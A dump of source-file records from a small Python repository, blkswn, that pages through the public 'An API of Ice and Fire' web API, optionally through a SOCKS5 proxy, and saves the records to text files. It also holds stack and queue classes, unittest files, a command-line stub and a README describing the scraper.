"is_vendor": false, "language": "Python", "length_bytes": 212, "license_type": "no_license", "max_line_length": 52, "num_lines": 11, "path": "/setup.py", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nfrom setuptools import setup\n\nsetup(\n setup_requires=['pbr>=1.9', 'setuptools>=17.1'],\n install_requires=[\n 'numpy', 'pandas',\n 'cached-property' ],\n pbr=True,\n)\n" }, { "alpha_fraction": 0.5978165864944458, "alphanum_fraction": 0.6144104599952698, "avg_line_length": 23.094736099243164, "blob_id": "c64053a4b1512721914a686302136892e5c2da5f", "content_id": "afbc4eb8df4e3c20bdc96dcfd702c5822159cf3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2290, "license_type": "no_license", "max_line_length": 87, "num_lines": 95, "path": "/blkswn/_IceFireA.py", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "## @file _IceFireA.py\n# @brief Analyzer for text files from IceFireR.py\n# @author weaves\n#\n#\n\nimport logging\nimport configparser\nimport socks\nimport socket\nfrom urllib import request\n\nfrom functools import partial\nfrom itertools import *\n\nfrom blkswn import Configuration\nfrom blkswn import IceFire\n\nimport ast\n\n\nclass IceFireA(object):\n \"\"\"\n Analyzer for text files.\n\n This is a test interface. It could just take a list iterator. Like from IceFireR.\n\n The text files are generated by IceFireR.py see test_Test2.py\n \"\"\"\n\n _type0 = None # books or characters or houses\n _src = None # the iterator\n\n @classmethod\n def make0(cls, **kwargs):\n ts = IceFire.types0\n ts = \", \".join(ts)\n\n cls.srcs = ( ( \"{x}\".format(x=x), \"{x}.txt\".format(x=x) ) for x in IceFire.types0 )\n\n cls.srcs = list(cls.srcs) \n\n fctr = lambda x: IceFireA(type0=x[0], file=x[1])\n cls.srcs0 = ( fctr(x) for x in cls.srcs )\n v0 = list((x._type0, x) for x in cls.srcs0)\n return dict(v0)\n\n\n def __init__(self, **kwargs):\n \"\"\"\n Set the type0 if given as a keyword. Take the filename and form an iterator.\n\n \"\"\"\n if 'type0' in kwargs:\n v0 = kwargs['type0']\n if not v0 in IceFire.types0:\n t0 = ','.join(IceFire.types0)\n s0 = '\"{v0}\" not a known type \"{t0}\"'.format(t0=t0, v0=v0)\n raise ValueError(s0)\n\n self._type0 = v0\n\n if 'file' in kwargs:\n with open(kwargs['file'], 'r') as f0:\n v0 = f0.read()\n v0 = ast.literal_eval(v0)\n self._src = iter(v0)\n\n if self._src is None:\n raise ValueError(\"no data source given\")\n\n def __str__(self):\n return str(self._type0)\n\n def filter(self, **kwargs):\n pass\n\n @classmethod\n def first_true(cls, iterable, default=False, pred=None):\n \"\"\"Returns the first true value in the iterable.\n\n If no true value is found, returns *default*\n\n If *pred* is not None, returns the first item\n for which pred(item) is true.\n\n \"\"\"\n # first_true([a,b,c], x) --> a or b or c or x\n # first_true([a,b], x, f) --> a if f(a) else b if f(b) else x\n return next(filter(pred, iterable), default)\n\n @classmethod\n def take(n, iterable):\n \"Return first n items of the iterable as a list\"\n return list(islice(iterable, n))\n\n" }, { "alpha_fraction": 0.6080567240715027, "alphanum_fraction": 0.6242715716362, "avg_line_length": 25.48322105407715, "blob_id": "dd85e2ca2ab94e6b68a8303278ba0b96dc69dff1", "content_id": "39587d9b61788d76dcadcb05571005aca51f9ae8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3947, "license_type": "no_license", "max_line_length": 98, "num_lines": 149, "path": "/blkswn/_IceFire.py", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "## @file _IceFire.py\n# @brief Iterator that pages through the server.\n# @author weaves\n#\n# @details\n# Each object is fixed to a URL base.\n#\n\nimport logging\nimport configparser\nimport socks\nimport socket\nfrom urllib import request\n\nimport ast\nimport re\n\nfrom functools import partial\n\nfrom blkswn import Fetcher\nfrom blkswn import Configuration\n\nclass IceFire(Fetcher):\n \"\"\"\n URL fetch with more features.\n\n These support an iterator interface that steps through pages and fetches pages of\n records.\n\n The record schema are handled in another class.\n\n @note\n I've not used the pointers in the header 'next', 'prev', 'first' or 'last'\n \"\"\"\n index0 = None\n\n types0 = ( 'books', 'houses', 'characters') # these are known to work and are in order of size.\n type0 = 'houses' # the default used by the ctr.\n idx0 = \"https://www.anapioficeandfire.com/api/{type0}\"\n idx1 = None\n base0 = \"https://www.anapioficeandfire.com/api/{type0}?page={page}&pageSize={pageSize}\"\n\n cpage = None\n npage = None\n\n def mkUrl(self, page=1, pageSize=10):\n \"\"\"\n Make an enquiry URL\n \"\"\"\n return self.base0.format(type0=self.type0, page=page, pageSize=pageSize)\n\n def __init__(self, **kwargs):\n \"\"\"\n Set the type0 if given as a keyword.\n\n Set idx1 for use with index.\n\n Pass others to the parent URL fetch class.\n \"\"\"\n super().__init__(**kwargs)\n if 'type0' in kwargs:\n self.type0 = kwargs['type0']\n\n self.idx1 = self.idx0.format(type0=self.type0)\n\n def _refs0(self, l0):\n \"\"\"\n Extract valid URLs from a string\n\n Separated by comma, then by semi-colon\n \"\"\"\n l1 = l0.split(',')\n parts = []\n for x in l1:\n l2 = re.sub(r'[<>]', '', x)\n l3 = l2.strip().split(';')\n for y in l3:\n l4 = y.strip()\n self.logger.info(str(Configuration.instance().isvalid0(l4)) + \"; \" + l4)\n if Configuration.instance().isvalid0(l4):\n parts.append(l4)\n return parts\n\n def extract(self, **kwargs):\n \"\"\"\n Utility method to extract information.\n\n 'index' extracts URLs; 'list' returns a data payload; 'pages' gets max and min pages.\n \"\"\"\n if 'index' in kwargs:\n return self._refs0(kwargs['index'])\n\n if 'list' in kwargs:\n r1 = kwargs['list']\n return ast.literal_eval(r1.decode())\n\n if 'pages' in kwargs:\n r1 = kwargs['pages']\n c0 = Configuration.instance().qparts\n f0 = lambda x: c0(x, fconv=int)['page']\n return [ f0(x) for x in r1 ]\n\n if 'pageSize' in kwargs: # returns a set\n r1 = kwargs['pageSize']\n c0 = Configuration.instance().qparts\n f0 = lambda x: c0(x, fconv=int)['pageSize']\n return { f0(x) for x in r1 }\n\n def __iter__(self):\n return self\n\n # Python 3 compatibility\n def __next__(self):\n if self.npage is None:\n self.index()\n else:\n if self.npage > max(self.pages): # loop counting with yield is tricky\n raise StopIteration()\n\n return self._page0(page=self.npage+1, pageSize=self.pageSize)\n\n def _page0(self, page=None, pageSize=None):\n \"\"\"\n Step through the pages.\n\n @note\n I've not used the pointers in the header 'next', 'prev', 'first' or 'last'\n \"\"\"\n yield self.cpage\n self.npage = page\n url0 = self.mkUrl(page=self.npage, pageSize=self.pageSize)\n r = self.fetch(url=url0)\n self.cpage = self.extract(list=r.read())\n\n def index(self, **kwargs):\n \"\"\"\n Gets the first page and processes the Link header to get the page count and page size.\n \"\"\"\n if not 'url' in kwargs:\n kwargs['url'] = self.idx1\n r = self.fetch(**kwargs)\n hdrs = r.info()\n if not 'Link' in hdrs:\n raise ValueError('No \\'Link\\' header in response.')\n self.index0 = self.extract(index=hdrs['Link'])\n self.pages = self.extract(pages=self.index0)\n self.pageSize = max(self.extract(pageSize=self.index0))\n self.cpage = self.extract(list=r.read())\n self.npage = min(self.pages)\n\n" }, { "alpha_fraction": 0.6158885955810547, "alphanum_fraction": 0.620802640914917, "avg_line_length": 22.689319610595703, "blob_id": "c786cf822d94aa48bdfa3aa87c673b74f5269d3f", "content_id": "a95bb6441bccd84461007a501f6e42d58e3e7f6a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2442, "license_type": "no_license", "max_line_length": 74, "num_lines": 103, "path": "/blkswn/_Fetcher.py", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "## @file _Fetcher.py\n# @brief URLs, headers and JSON\n# @author weaves\n#\n# @details\n# Singleton to fetch and split.\n#\n# @note\n# \n\nimport logging\nimport configparser\nimport socks\nimport socket\nfrom urllib import request\nfrom urllib.parse import urlparse\n\nimport ast\nimport re\n\nfrom functools import partial\n\nclass Fetcher(object):\n \"\"\"\n URL fetch with more features.\n \"\"\"\n _tions = None\n _hdrs = None\n _opener = None\n\n def __init__(self, **kwargs):\n self.config = kwargs.get('config', configparser.ConfigParser())\n self.logger = kwargs.get('logger', logging.getLogger('Test'))\n if 'fetcher-proxy' in self.config.sections():\n d0 = self.config['fetcher-proxy']\n if d0['type'].startswith(\"socks5\"):\n socks.set_default_proxy(socks.SOCKS5, d0['host'], int(d0['port']))\n socket.socket = socks.socksocket\n if 'hdrs' in d0:\n self._hdrs = ast.literal_eval(d0['hdrs'])\n self._opener = request.build_opener()\n self._opener.addheaders = self._hdrs\n pass\n\n def fetch(self, **kwargs):\n if self._opener is not None:\n request.install_opener(self._opener)\n return request.urlopen(kwargs['url'])\n\n def dispose(self):\n \"\"\"\n The media info has to be re-created for every file.\n \"\"\"\n pass\n\n\nclass _Singleton(object):\n \"\"\"\n A configuration singleton\n \"\"\"\n _impl = None\n config = None\n\n @classmethod\n def instance(cls, **kwargs):\n if cls._impl is None:\n cls._impl = _Singleton()\n cls.config = configparser.ConfigParser()\n if kwargs.get('file', None) is not None:\n cls.config.read(kwargs['file'])\n if kwargs.get('config', None) is not None:\n cls.config = config.read(kwargs['config'])\n\n return cls._impl\n\n def isvalid0(self, url):\n \"\"\"\n Utility boolean test method to check is a string is a URI.\n \"\"\"\n try:\n result = urlparse(url)\n return all([result.scheme, result.netloc, result.path])\n except:\n return False\n\n return True\n\n def qparts(self, url, **kwargs):\n \"\"\"\n Extract the query part of a URL and return it as a dictionary.\n\n The keywords allow a conversion function to be used: fconv=int\n \"\"\"\n purl = url\n if self.isvalid0(url):\n purl = urlparse(url).query\n \n qs = dict([ x.split('=') for x in purl.split('&') ])\n if 'fconv' in kwargs:\n fconv = kwargs['fconv']\n qs = dict([ (x[0], fconv(x[1])) for x in qs.items() ])\n\n return qs\n\n\n" }, { "alpha_fraction": 0.5180851221084595, "alphanum_fraction": 0.5393617153167725, "avg_line_length": 24.37837791442871, "blob_id": "f7448b9d2e8b2994506558bff5de7bb5ca1e3a0b", "content_id": "771809abb3b3c70547b2084e899286f4a92ac197", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 940, "license_type": "no_license", "max_line_length": 66, "num_lines": 37, "path": "/blkswn/_Queue.py", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "from blkswn import Stack\n\nclass Queue:\n\n def __init__(self):\n self.stack_1 = Stack()\n self.stack_2 = Stack()\n\n def enqueue(self, item):\n self.stack_1.push(item)\n\n def push(self, item):\n self.enqueue(item)\n\n def pop(self):\n return self.dequeue()\n\n def peek(self):\n return self.stack_1.elements[0]\n\n def size(self):\n return self.stack_1.size() + self.stack_2.size()\n\n def is_empty(self):\n return self.stack_1.is_empty() and self.stack_2.is_empty()\n\n def dequeue(self):\n if not self.stack_1.is_empty():\n while self.stack_1.size() > 0:\n self.stack_2.push(self.stack_1.pop())\n res = self.stack_2.pop()\n while self.stack_2.size() > 0:\n self.stack_1.push(self.stack_2.pop())\n return res\n else:\n ## Be consistent and throw an IndexError\n self.stack_1.pop()\n\n" }, { "alpha_fraction": 0.655414879322052, "alphanum_fraction": 0.6582278609275818, "avg_line_length": 19.171428680419922, "blob_id": "717ddf7945e51b9b14428c200bfdf98f70ac9083", "content_id": "dae3ce173ab0e678c7e2b7d27ba5332921574556", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 711, "license_type": "no_license", "max_line_length": 52, "num_lines": 35, "path": "/blkswn/_Utility.py", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "## @file _Utility.py\n# @brief Analyzer for text files from IceFireR.py\n# @author weaves\n#\n#\n\nimport logging\nimport configparser\nimport socks\nimport socket\nfrom urllib import request\n\nfrom functools import partial\nfrom itertools import *\n\nclass _Utility(object):\n \"\"\"\n A configuration singleton\n \"\"\"\n _impl = None\n\n @classmethod\n def instance(cls, **kwargs):\n if cls._impl is None:\n cls._impl = _Utility()\n\n cls.config = configparser.ConfigParser()\n if kwargs.get('file', None) is not None:\n cls.config.read(kwargs['file'])\n if kwargs.get('config', None) is not None:\n cls.config = config.read(kwargs['config'])\n\n return cls._impl\n\n# def count0(self, s0):\n \n" }, { "alpha_fraction": 0.3541666567325592, "alphanum_fraction": 0.4375, "avg_line_length": 15, "blob_id": "4c9a254c66e0fa64d61cd02e11d165c6268e7624", "content_id": "755c6ea701b6c90836720a497e3c3c7ab5eb57b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 48, "license_type": "no_license", "max_line_length": 23, "num_lines": 3, "path": "/blkswn/_version.py", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\n__version__ = u\"0.1.0\"\n" }, { "alpha_fraction": 0.7351852059364319, "alphanum_fraction": 0.7481481432914734, "avg_line_length": 27.421052932739258, "blob_id": "eca0042d57452fd8057ddf968879e0f70a79b32a", "content_id": "16d36869aa6e7b5908aefc472771d93270100db4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 540, "license_type": "no_license", "max_line_length": 55, "num_lines": 19, "path": "/blkswn/__init__.py", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\nfrom blkswn._version import __version__\nfrom blkswn._Stack import Stack\nfrom blkswn._Queue import Queue\nfrom blkswn._Fetcher import Fetcher\nfrom blkswn._Fetcher import _Singleton as Configuration\nfrom blkswn._IceFire import IceFire\nfrom blkswn._IceFireR import IceFireR\nfrom blkswn._IceFireA import IceFireA\n\nfrom blkswn._Utility import _Utility as Utility\n\n__copyright__ = 'Copyright 2019 Walter Eaves'\n__license__ = 'GPLv3'\n__title__ = 'blkswn'\n\n# appease flake8: the imports are purposeful\n(__version__, Stack, Queue)\n" }, { "alpha_fraction": 0.564064085483551, "alphanum_fraction": 0.58733731508255, "avg_line_length": 24.9350643157959, "blob_id": "760bffe4d4c952cfa5a28f0bf458d89d53d2cd58", "content_id": "5c49e32a9c13f6f11973e20af49e928e302c44ac", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3996, "license_type": "no_license", "max_line_length": 92, "num_lines": 154, "path": "/tests/test_Test1.py", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "\"\"\"\nTest file \n\n\"\"\"\n## @file Test1.py\n# @author weaves\n# @brief Unittest\n#\n# @note\n#\n# Relatively complete test.\n\nimport sys, logging, os\nfrom unidecode import unidecode\nfrom datetime import datetime, timezone, timedelta, date\nfrom collections import Counter\nimport re\nfrom urllib.parse import urlparse\n\nfrom blkswn import Configuration\nfrom blkswn import IceFire\n\nimport unittest\n\nlogfile = os.environ['X_LOGFILE'] if os.environ.get('X_LOGFILE') is not None else \"test.log\"\nlogging.basicConfig(filename=logfile, level=logging.DEBUG)\nlogger = logging.getLogger('Test')\nsh = logging.StreamHandler()\nlogger.addHandler(sh)\n\ntrs0 = os.path.join(os.path.dirname(__file__), \"test.txt\")\n\n\nclass Test1(unittest.TestCase):\n \"\"\"\n A source directory dir0 is taken from the environment as SDIR or \n is tests/media and should contain .m4a files.\n A file tests/p1.lst is also needed. It can list the files in the\n directory.\n \"\"\"\n queue0 = None\n\n dir0 = os.getcwd()\n files0 = []\n files = []\n logger = None\n x0 = \"empty\"\n\n ## Sets pandas options and logging.\n @classmethod\n def setUpClass(cls):\n global logger\n cls.logger = logger\n Configuration.instance(file='blkswn.cfg') # singleton\n\n ## Logs out.\n @classmethod\n def tearDownClass(cls):\n pass\n\n ## Null setup.\n def setUp(self):\n self.logger.info('setup')\n\n ## Null tear down\n def tearDown(self):\n self.logger.info('tearDown')\n\n ## Constructs\n def test_000(self):\n try:\n with open('hdrs.json') as f0:\n l0 = f0.read()\n self.logger.info(l0)\n except:\n return\n\n l1 = l0.split(',')\n parts = []\n for x in l1:\n l2 = re.sub(r'[<>]', '', x)\n l3 = l2.strip().split(';')\n for y in l3:\n l4 = y.strip()\n self.logger.info(str(Configuration.instance().isvalid0(l4)) + \"; \" + l4)\n if Configuration.instance().isvalid0(l4):\n parts.append(l4)\n\n self.logger.info(parts)\n\n def test_002(self):\n chs = IceFire(config = Configuration.instance().config, type0='characters')\n v0 = chs.mkUrl(page=1, pageSize=10)\n self.assertIsNotNone(v0)\n self.assertIsInstance(v0, str)\n self.assertTrue(len(v0) > 0)\n self.logger.info(v0)\n\n def test_004(self):\n chs = IceFire(config = Configuration.instance().config, type0='characters')\n v0 = chs.idx1\n self.assertIsNotNone(v0)\n self.assertIsInstance(v0, str)\n self.assertTrue(len(v0) > 0)\n self.logger.info(v0)\n\n def test_006(self):\n chs = IceFire(config = Configuration.instance().config, type0='characters')\n v0 = chs.index()\n self.logger.info(v0)\n self.logger.info(chs.index0)\n\n self.logger.info(str(chs.pages) + \"; \" + str(chs.pageSize))\n\n def test_008(self):\n chs = IceFire(config = Configuration.instance().config, type0='books',\n logger=self.logger)\n\n ichs = iter(chs)\n\n v0 = list(next(chs))[0]\n\n v1 = v0[0]\n self.logger.info(type(v1))\n self.logger.info(v1['url'])\n\n v1 = v0[-1]\n self.logger.info(type(v1))\n self.logger.info(v1['url'])\n\n v0 = list(next(chs))[0]\n\n v1 = v0[0]\n self.logger.info(type(v1))\n self.logger.info(v1['url'])\n\n v1 = v0[-1]\n self.logger.info(type(v1))\n self.logger.info(v1['url'])\n\n\n\n#\n# The sys.argv line will complain to you if you run it with ipython\n# emacs. The ipython arguments are passed to unittest.main.\n\nif __name__ == '__main__':\n if len(sys.argv) and \"ipython\" not in sys.argv[0]:\n # If this is not ipython, run as usual\n unittest.main(sys.argv)\n else:\n # If not remove the command-line arguments.\n sys.argv = [sys.argv[0]]\n unittest.main(module='Test', verbosity=3, failfast=True, exit=False)\n\n\n" }, { "alpha_fraction": 0.5659446120262146, "alphanum_fraction": 0.5907595157623291, "avg_line_length": 27.484375, "blob_id": "b4e62c4611f0dd6846ac3de3ea1f30ff8568c853", "content_id": "6fe34888c038215d08166a2e24dd1d337a71d1bb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7294, "license_type": "no_license", "max_line_length": 92, "num_lines": 256, "path": "/tests/test_Test.py", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "\"\"\"\nTest file \n\n\"\"\"\n## @file Test.py\n# @author weaves\n# @brief Unittest\n#\n# @note\n#\n# Relatively complete test.\n\nimport sys, logging, os\nfrom unidecode import unidecode\nfrom datetime import datetime, timezone, timedelta, date\nfrom collections import Counter\nimport configparser\nimport json\nimport ast\nfrom urllib.parse import urlparse\n\nimport unittest\n\nfrom blkswn import Stack\nfrom blkswn import Fetcher, Configuration\nfrom blkswn import IceFire\n\nlogfile = os.environ['X_LOGFILE'] if os.environ.get('X_LOGFILE') is not None else \"test.log\"\nlogging.basicConfig(filename=logfile, level=logging.DEBUG)\nlogger = logging.getLogger('Test')\nsh = logging.StreamHandler()\nlogger.addHandler(sh)\n\ntrs0 = os.path.join(os.path.dirname(__file__), \"test.txt\")\n\nclass Test(unittest.TestCase):\n \"\"\"\n A source directory dir0 is taken from the environment as SDIR or \n is tests/media and should contain .m4a files.\n A file tests/p1.lst is also needed. It can list the files in the\n directory.\n \"\"\"\n stack0 = None\n\n dir0 = os.getcwd()\n files0 = []\n files = []\n logger = None\n x0 = \"empty\"\n\n ## Sets pandas options and logging.\n @classmethod\n def setUpClass(cls):\n global logger\n cls.logger = logger\n\n for root, dirs, files in os.walk(cls.dir0, topdown=True):\n for name in files:\n cls.files.append(os.path.join(root, name))\n\n cls.files.sort()\n cls.files0 = cls.files.copy()\n cls.logger.info('files: ' + unidecode('; '.join(cls.files)))\n \n ## Logs out.\n @classmethod\n def tearDownClass(cls):\n pass\n\n ## Null setup.\n def setUp(self):\n self.logger.info('setup')\n if not type(self).files:\n type(self).files = type(self).files0\n \n self.file0, *type(self).files = type(self).files\n\n ## Null tear down\n def tearDown(self):\n self.logger.info('tearDown')\n\n ## Constructs\n def test_000(self):\n self.stack0 = Stack()\n self.assertIsNotNone(self.stack0)\n\n ## Check empty responses\n ## Call prior\n def test_001(self):\n self.test_000()\n self.assertIsNotNone(self.stack0)\n self.logger.info('stack0: ' + str(self.stack0))\n self.assertTrue(self.stack0.is_empty())\n\n def test_002(self):\n self.test_001()\n x0 = \"empty1\"\n with self.assertRaises(IndexError):\n x0 = self.stack0.pop()\n self.logger.info('stack0: ' + x0)\n\n def test_003(self):\n self.test_001()\n x1 = \"empty1\"\n with self.assertRaises(IndexError):\n x1 = self.stack0.peek()\n self.logger.info('stack0: ' + x1)\n\n ### push one\n def test_004(self):\n self.test_001()\n x1 = self.stack0.push(self.x0)\n self.assertIsNone(x1)\n self.assertFalse(self.stack0.is_empty())\n\n ## check identity on pop\n def test_005(self):\n self.test_004()\n x1 = self.stack0.pop()\n self.assertIsNotNone(x1)\n self.logger.info('stack0: ' + x1)\n self.assertEqual(x1, self.x0)\n self.assertIs(x1, self.x0)\n\n ## check identity on peek\n def test_006(self):\n self.test_004()\n x1 = self.stack0.peek()\n self.assertIsNotNone(x1)\n self.logger.info('stack0: ' + x1)\n self.assertEqual(x1, self.x0)\n self.assertIs(x1, self.x0)\n\n ## Check with a load\n def test_007(self):\n self.test_001()\n sz0 = len(self.files)\n self.assertTrue(sz0 > 0)\n self.logger.info('stack0: pushing: sz0: ' + str(sz0))\n\n for name in self.files:\n self.stack0.push(name)\n\n self.assertTrue(self.stack0.size() > 0)\n self.assertEqual(sz0, self.stack0.size())\n\n while sz0 > 0:\n self.stack0.pop()\n sz0 -= 1\n\n self.assertTrue(self.stack0.is_empty())\n\n def test_009(self):\n config = Configuration.instance(file='blkswn.cfg').config\n\n v0 = config.sections()\n self.logger.info(str(v0))\n self.assertIsNotNone(v0)\n self.assertTrue(config['fetcher-proxy'])\n self.logger.info(config['fetcher-proxy']['host'])\n self.logger.info(config['fetcher-proxy']['port'])\n self.logger.info(config['fetcher-proxy']['type'])\n ftchr = Fetcher(logger=self.logger, config=config)\n # ftchr = Fetcher(logger=self.logger)\n self.assertIsNotNone(ftchr)\n self.logger.info(ftchr)\n\n def test_011(self):\n \"\"\"\n This uses the singleton constructed above.\n \"\"\"\n v0 = \"http://www.bt.com/\"\n\n ftchr = Fetcher(logger=self.logger, config=Configuration.instance().config)\n r = ftchr.fetch(url=v0)\n self.assertIsNotNone(r)\n\n v0 = \"http://www.anapioficeandfire.com/api/characters/2105\"\n ctr = 1;\n while ctr > 0:\n ctr -= 1\n r = ftchr.fetch(url=v0)\n self.assertIsNotNone(r)\n self.logger.info(str(r.info()))\n self.logger.info(r.read())\n\n def test_013(self):\n \"\"\"\n This uses the singleton constructed above.\n \"\"\"\n\n ftchr = Fetcher(logger=self.logger, config=Configuration.instance().config)\n v0 = \"http://www.anapioficeandfire.com/api/characters\"\n ctr = 1;\n while ctr > 0:\n ctr -= 1\n r = ftchr.fetch(url=v0)\n self.assertIsNotNone(r)\n self.logger.info(str(r.info()))\n self.logger.info(r.read())\n\n\n def test_015(self):\n \"\"\"\n Houses use the Link response header to get the number of pages and the page size.\n \"\"\"\n ftchr = Fetcher(logger=self.logger, config=Configuration.instance().config)\n idx0 = \"https://www.anapioficeandfire.com/api/houses\"\n\n r = ftchr.fetch(url=idx0)\n hdrs = r.info()\n r1 = r.read()\n\n self.assertTrue('Link' in hdrs)\n self.logger.info(hdrs['Link'])\n with open('houses.bytes', 'wb') as f0:\n f0.write(r1)\n\n with open('hdrs.json', 'w') as f0:\n f0.write(hdrs['Link'])\n\n x0 = ast.literal_eval(r1.decode())\n self.logger.info(type(x0))\n self.assertTrue(len(x0) > 0)\n self.logger.info(x0[-1])\n\n def test_017(self):\n \"\"\"\n Houses use the Link response header to get the number of pages and the page size.\n \"\"\"\n ftchr = IceFire(logger=self.logger, config=Configuration.instance().config)\n idx0 = \"https://www.anapioficeandfire.com/api/houses\"\n ftchr.index(url=idx0)\n x0 = ftchr.cpage\n self.logger.info(x0[-1])\n self.logger.info(ftchr.index0)\n\n x1 = urlparse(ftchr.index0[0])\n self.assertIsNotNone(x1)\n self.logger.info(x1.query)\n d0 = Configuration.instance().qparts(x1.query)\n self.logger.info(str(d0))\n\n\n#\n# The sys.argv line will complain to you if you run it with ipython\n# emacs. The ipython arguments are passed to unittest.main.\n\nif __name__ == '__main__':\n if len(sys.argv) and \"ipython\" not in sys.argv[0]:\n # If this is not ipython, run as usual\n unittest.main(sys.argv)\n else:\n # If not remove the command-line arguments.\n sys.argv = [sys.argv[0]]\n unittest.main(module='Test', verbosity=3, failfast=True, exit=False)\n\n\n" }, { "alpha_fraction": 0.5395227670669556, "alphanum_fraction": 0.5488441586494446, "avg_line_length": 23.605504989624023, "blob_id": "6da1be5d9a688ac402727cd084c775dea900aa5b", "content_id": "703c04af418b7c681473ffdba78cc2862b9397f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2682, "license_type": "no_license", "max_line_length": 87, "num_lines": 109, "path": "/blkswn/__main__.py", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n# coding=utf-8\n#\n## @file Frctl0\n# @author weaves\n# @brief Frctl0\n#\n# CLI to Frctl itself an interface to MediaInterface\n\n\"\"\"\nAn command-line stack and queue\n\nUsage:\n blkswn (-h | --help)\n blkswn [-e PATTERN]... [-f FILTER]... [-F FILTER]... [options] [<input>]...\n\nArguments:\n input Files, directories, or glob patterns to upload.\n Defaults to current directory.\n\nOptions:\n -h, --help Display help message.\n -l, --log Enable gmusicapi logging.\n -d, --dry-run Output list of songs that would be uploaded.\n -q, --quiet Don't output status messages.\n With -l,--log will display warnings.\n With -d,--dry-run will parameters.\n -f FILE, --files FILE File containing files.\n -c COMMAND, --command COMMAND What to do: chapters\n\nPatterns can be any valid Python regex patterns.\n\"\"\"\n\nimport logging, os, sys, re\n\nfrom unidecode import unidecode\nfrom docopt import docopt\n\nfrom blkswn import Stack, Queue\n\nQUIET = 25\nlogging.addLevelName(25, \"QUIET\")\n\n\nlogging.basicConfig(filename='blkswn.log', level=QUIET)\nlogger = logging.getLogger('Frctl')\nsh = logging.StreamHandler()\nlogger.addHandler(sh)\n\nblkswn = None\ncli = None\n\ndef main():\n global cli\n cli = dict((key.lstrip(\"-<\").rstrip(\">\"), value)\n for key, value in docopt(__doc__).items())\n\n enable_logging = cli['log']\n\n if cli['quiet']:\n logger.setLevel(QUIET)\n else:\n logger.setLevel(logging.INFO)\n\n if enable_logging:\n logger.setLevel(logging.DEBUG)\n\n for k in cli.items():\n logger.info(k)\n \n files = []\n if cli['files']:\n x0 = cli['files']\n logger.info('files: ' + type(x0).__name__)\n with open(x0[0], encoding=\"utf-8\") as f:\n files = f.read().splitlines()\n\n if len(files) <= 0:\n raise RuntimeError('a file of files is a required argument')\n\n if cli['command']:\n chapter(files)\n\n return\n\ndef chapter(files):\n global cli\n\n ## The new split operator\n h0, *t0 = files\n\n logger.info(\"files: \" + unidecode('; '.join(t0)))\n\n stack0 = Stack()\n\n print(stack0.is_empty())\n\n for f in t0:\n if cli['dry-run']:\n logger.info(\"file: f: \" + unidecode(f))\n continue\n stack0.push(f)\n\n print(stack0.size())\n print(stack0.is_empty())\n\nif __name__ == '__main__':\n sys.argv[0] = re.sub(r'(-script\\.pyw|\\.exe)?$', '', sys.argv[0])\n sys.exit(main())\n" }, { "alpha_fraction": 0.7358961701393127, "alphanum_fraction": 0.7428856492042542, "avg_line_length": 25.342105865478516, "blob_id": "ac56479951f8c321bc3eff609c4d9d49537ae6aa", "content_id": "637228871f89c165b430e818e1a76014e8e5f08d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2003, "license_type": "no_license", "max_line_length": 83, "num_lines": 76, "path": "/blkswn/README.md", "repo_name": "eepgwde/blkswn", "src_encoding": "UTF-8", "text": "* weaves\n\n** Packaging module is blkswn\n\nThe __init__.py script brings the module imports together.\n\nThere is a singleton Configuration.instance() with utility methods in\n_Fetcher\n\n_Queue.py _version.py _Stack.py are from this package's template. They can\nbe ignored.\n\n__main__.py is a sample command-line script: not implemented.\n\n** ETL Website scraper\n\nThis is a test system for an online website at\n\n https://www.anapioficeandfire.com/api/{type0}?page={page}&pageSize={pageSize}\n\nIt's only a test system and captures to text file.\n\n*** Extract\n\n _Fetcher _IceFire and the test scripts test_Test and test_Test1\n\nLoad the data from the website in pages.\nThe test scripts write to text files.\n\n*** Transform\n\n_IceFireR provides an iterator for each record on the website pages, see test_Test2\n\nThere's a configuration file that I use to make use of a local web proxy.\nblkswn.cfg see Fetcher. There are limits on the number of web-accesses.\n\nThe test scripts produce text files, in which the records are transformed\nto dictionaries and each text file books.txt characters.txt or houses.txt \n\n** Load and Simple Analysis\n\nYou can then load the textfile output with a typing string \"books\" (or\n{type0}, see IceFire's class variables.)\n\nAnd do some simple analysis. \n\nThis is tested and demonstrated in test_Test3\n\nThis stage uses a file but should be implemented as a iterator stream.\n\n** Improvements\n\n*** web-source: Link response header: next, first, prev, last\n\nI didn't make full use of these. I just count the pages. Some databases\nmight enforce prev and next and not allow incremental page access.\n\n*** Streamed filtering\n\nIceFireA should be able to use an IceFireR as an iterator data source. And\ncaching would be a useful extension for that.\n\n\n\n* This file's Emacs file variables\n\n[ Local Variables: ]\n[ mode:text ]\n[ mode:outline-minor ]\n[ mode:auto-fill ]\n[ fill-column: 75 ]\n[ coding: iso-8859-1-unix ]\n[ comment-column:50 ]\n[ comment-start: \"[ \" ]\n[ comment-end:\"]\" ]\n[ End: ]\n\n" }, { "alpha_fraction": 0.766262412071228, "alphanum_fraction": 